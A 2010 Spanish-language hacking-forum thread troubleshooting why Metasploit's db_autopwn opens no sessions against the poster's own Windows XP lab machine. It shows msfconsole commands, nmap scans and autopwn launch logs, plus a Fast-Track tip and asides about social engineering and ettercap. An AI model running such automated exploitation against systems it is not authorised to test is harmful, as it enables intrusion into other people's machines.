Foro de elhacker.net

Seguridad Informática => Hacking => Mensaje iniciado por: dazoverride en 22 Abril 2010, 20:11 pm



Título: db_autopwn funciona?
Publicado por: dazoverride en 22 Abril 2010, 20:11 pm
Hola tengo una duda, he investigado sobre el comando db_autopwn de metasploit framework 3.3 y parece que corre pero no me crea sesiones, en cambio lo ago manualmente (exploto con el simple windows/smb/ms08_067_netapi) y funciona a la perfección.

mis pasos son:
1-creo la base de datos en sqlite3
2-luego con db_nmap -n -sL -PN 192.168.1.5 en este caso una maquina virtual windows XP vulnerable al exploit windows/smb/ms08_067_netapi
3-db_ autopwn -t -p -e  tambien e probado la opcion -r para que sea una conexion reverse.

vale ahora empieza a comprobar y tal pero no me crea session meterpretetr incluso cuando comprueba con el exploit vulnerable el cual es visible en la consola.

se les ocurre algo que e hecho mal? si lo necesitan os enviaré screenshots que ahora estoy en clase y no tengo tiempo :P

gracias de antemano.


Título: Re: db_autopwn funciona?
Publicado por: laideker en 23 Abril 2010, 03:37 am
Si usas Backtrack, desde la consola teclea:
cd /pentest/exploits/fasttrack
sudo ./fast-track.py -g
Ingresas a http://127.0.0.1:44444 desde el navegador.
y en la barra izquierda busca Autopwn Automation, ahí pones la IP y le das en Metasploit Autopwn y lo hace todo automático...

salu2


Título: Re: db_autopwn funciona?
Publicado por: Shell Root en 23 Abril 2010, 03:53 am
Emmm danos más especificaciones, tales como, es una IP Publica o Privada?, en caso tal de que sea privada, estás en red con ese equipo?.

Muestranos que resultado te genera el Nmap. Así:
Código:
root@bt:~# nmap [host-name || direccion-ip]


Título: Re: db_autopwn funciona?
Publicado por: dazoverride en 23 Abril 2010, 22:35 pm
Si estoy conectado a una red privada lo daba por sabido lo siento, también me conecto con wifi(wlan0) aqui tienes mi nmap:
Código:
dazoverride@xxx:~$ sudo nmap -sP 192.168.2.0/24
[sudo] password for dazoverride:

Starting Nmap 5.21 ( http://nmap.org ) at 2010-04-23 22:09 CEST
Nmap scan report for 192.168.2.1 --> router
Host is up (0.0021s latency).
Nmap scan report for 192.168.2.2 --> pc de sobremesa ubuntu
Host is up (0.0042s latency).
Nmap scan report for 192.168.2.4 -->pc_atacante(ubuntu)
Host is up.
Nmap scan report for 192.168.2.5 --> pc_victima(windows_xp con vulnerabilidad windows/smb/ms08_067_netapi
Host is up (0.00057s latency).
como e dicho antes ahora lo que haria es abrir el msfconsole y:
Código:
msf > db_create prueba
[*] Creating a new database instance...
[*] Successfully connected to the database
[*] File: prueba
msf > db_connect prueba
[*] Successfully connected to the database
[*] File: prueba
msf > db_nmap -n -sT -PN 192.168.2.5

Starting Nmap 5.21 ( http://nmap.org ) at 2010-04-23 22:21 CEST
Nmap scan report for 192.168.2.5
Host is up (0.010s latency).
Not shown: 995 closed ports
PORT      STATE SERVICE
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
3389/tcp  open  ms-term-serv
31337/tcp open  Elite

Nmap done: 1 IP address (1 host up) scanned in 1.32 seconds

msf > db_autopwn -t -p -e
[*] Analysis completed in 6 seconds (0 vulns / 0 refs)
[*]
[*] ===============================================================
[*]                             Matching Exploit Modules
[*] ===============================================================
[*]   192.168.2.5:139  exploit/windows/smb/ms08_067_netapi  (port match)
(he quitado los demás para ahorrar espacio)
===============================================================
[*]
[*]
[*] (1/43 [0 sessions]): Launching exploit/windows/dcerpc/ms03_026_dcom against 192.168.2.5:135...
[*] (2/43 [0 sessions]): Launching exploit/linux/samba/lsa_transnames_heap against 192.168.2.5:139...
.........
[*] (18/43 [0 sessions]): Launching exploit/windows/smb/ms08_067_netapi against 192.168.2.5:139...
.........
[*] (42/43 [0 sessions]): Launching exploit/windows/smb/psexec against 192.168.2.5:445...
[*] (43/43 [0 sessions]): Launching exploit/windows/smb/timbuktu_plughntcommand_bof against 192.168.2.5:445...
[*] (43/43 [0 sessions]): Waiting on 15 launched modules to finish execution...
[*] (43/43 [0 sessions]): Waiting on 0 launched modules to finish execution...
[*] The autopwn command has completed with 0 sessions


de todas formas lo que mas me sorprende es que me entre al pc victima cuando lo exploto manualmente con el exploit windows/smb/ms08_067_netapi y luego cuando utilizo el db_autopwn vea pasar el exploit como si estuviera intentando explotar el servicio y las sessions siguen a 0. Ademas tambien he probado lo de importar el scan del nessus correctamente incluso veia las vulnerabilidades con el comando db_vulns del metasploit y ejecute la opcion -x del db_autopwn y nada....

Por cierto lo del fast-track enseguida lo pruebo y os informo.


Título: Re: db_autopwn funciona?
Publicado por: Debci en 23 Abril 2010, 22:37 pm
Como ya han comentado, lo interesante para estos ataques tan lammers (eee que a mi tambien me gustan), es usar Fast-track, pues este lo configura todo y te aseguras del correcto funcionamiento de la rutina.

Añado de paso, que es posible que no hayas identificado bien al host, o que haya algun argumento erroneo en el comando autopwn.

Saludos


Título: Re: db_autopwn funciona?
Publicado por: dazoverride en 23 Abril 2010, 22:47 pm
vaya con el fast-track me vais a convencer para probarlo, coincido contigo es una tecnica lammer yo tambien prefiero hacerlo manualmente pero si no funciona manualmente pues como segunda opcion es perfecta bueno voy a arrancar el backtrack y a probar el fast-track gracias a todos de todas formas si alguien tiene una solucion para el tema principal que me lo haga saber please


Título: Re: db_autopwn funciona?
Publicado por: Debci en 23 Abril 2010, 22:51 pm
vaya con el fast-track me vais a convencer para probarlo, coincido contigo es una tecnica lammer yo tambien prefiero hacerlo manualmente pero si no funciona manualmente pues como segunda opcion es perfecta bueno voy a arrancar el backtrack y a probar el fast-track gracias a todos de todas formas si alguien tiene una solucion para el tema principal que me lo haga saber please
El gustillo de encontrar la vulnerabilidad por tu mano y como si de una metralleta P90 se tratase bombardeando el sistema con exploits, no tiene precio, pero claro esta que el autopwn te peude servir para determinar si tienes que irte lejos para entrar o con metasploit mismo puedes hacerlo.

Saludos


Título: Re: db_autopwn funciona?
Publicado por: dazoverride en 23 Abril 2010, 23:03 pm
bendito fast-track XD teniais razon, me funciona y es una lammerada XD
parece que el fallo era el ubuntu, con el backtrack me funciona el db_autopwn haciendo los mismo pasos que con el ubuntu....
bueno ya me lo mirare, algo tendré mal en el ubuntu.. por mi el tema queda cerrado :D

gracias a todos gran trabajo :D :D


Título: Re: db_autopwn funciona?
Publicado por: Debci en 23 Abril 2010, 23:29 pm
bendito fast-track XD teniais razon, me funciona y es una lammerada XD
parece que el fallo era el ubuntu, con el backtrack me funciona el db_autopwn haciendo los mismo pasos que con el ubuntu....
bueno ya me lo mirare, algo tendré mal en el ubuntu.. por mi el tema queda cerrado :D

gracias a todos gran trabajo :D :D
Se bueno  ;)

Saludos


Título: Re: db_autopwn funciona?
Publicado por: [L]ord [R]NA en 24 Abril 2010, 20:42 pm
personalmente a mi no me gusta el db_autopwn... es como si fuera una pistola en las manos de un mono que aprendio a manipularla pero no tiene sentido comun. muchas de las personas que utilizan el Metasploit se podria decir que no saben como funcionan las vulnerabilidades, simplemente la usan y listo...


Título: Re: db_autopwn funciona?
Publicado por: Debci en 24 Abril 2010, 20:59 pm
personalmente a mi no me gusta el db_autopwn... es como si fuera una pistola en las manos de un mono que aprendio a manipularla pero no tiene sentido comun. muchas de las personas que utilizan el Metasploit se podria decir que no saben como funcionan las vulnerabilidades, simplemente la usan y listo...
Es importante decir que ante un host real tiene pocas probabilidades de exito, para estos es mejor ingenieria social o es muy dificil encontrar algun servicio vulnerable.

Saludos


Título: Re: db_autopwn funciona?
Publicado por: dazoverride en 25 Abril 2010, 17:04 pm
estoy deacuerdo con los dos el autopwn es un poco lammer y ademas tambien prefiero hacerlo manualmente, y es cierto, un pc real no suele tener muchas vulnerabilidades, como muxo la del ms08_067_netapi pero bueno siempre va bien saberlo.

los ataques que mas me gustan con metasploit son sumandole el ettercap, ahi es cuando empieza a ser peligroso el metasploit, de momento no se hacer muxo mas, espero aprender mas sobre el metrasploit.

saludos!


Título: Re: db_autopwn funciona?
Publicado por: [L]ord [R]NA en 25 Abril 2010, 17:46 pm
estoy deacuerdo con los dos el autopwn es un poco lammer y ademas tambien prefiero hacerlo manualmente, y es cierto, un pc real no suele tener muchas vulnerabilidades, como muxo la del ms08_067_netapi pero bueno siempre va bien saberlo.

los ataques que mas me gustan con metasploit son sumandole el ettercap, ahi es cuando empieza a ser peligroso el metasploit, de momento no se hacer muxo mas, espero aprender mas sobre el metrasploit.

saludos!

Si lees bien vez que no me gusta y expreso las razones por lo tanto no creo que este en el grupo de los 2 con los que estas en desacuerdo